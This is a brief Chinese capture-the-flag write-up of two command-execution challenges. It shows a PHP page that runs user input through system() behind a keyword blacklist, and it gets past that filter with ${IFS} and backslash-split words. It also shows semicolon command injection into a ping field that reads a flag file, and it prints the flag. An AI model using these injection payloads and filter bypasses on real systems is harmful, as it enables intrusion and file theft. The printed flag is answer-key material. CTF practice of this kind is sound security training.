[MoeCTF 2021]babyRCE
考点:关键词过滤(绕过方法参考往期博客)
来源:nssctf
<?php
$rce = $_GET['rce'];
if (isset($rce)) {
if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
system($rce);
}else {
echo "hhhhhhacker!!!"."\n";
}
} else {
highlight_file(__FILE__);
}
先用ls查看
空格可以用${IFS}绕过
构造payload:?rce=ca\t${IFS}fl\ag.php
command_execution
考点:命令执行
来源:攻防世界
先ping一下127.0.0.1
再用;来连接两个命令 127.0.0.1;ls
试试看能不能查看inddex.php
127.0.0.1;cat index.php
很明显,不行,那就退级看看
在home中发现flag。
查看flag
127.0.0.1;cat …/…/…/home/flag.txt
cyberpeace{ac541782e73fa1da4a98ec4bc3449fb1}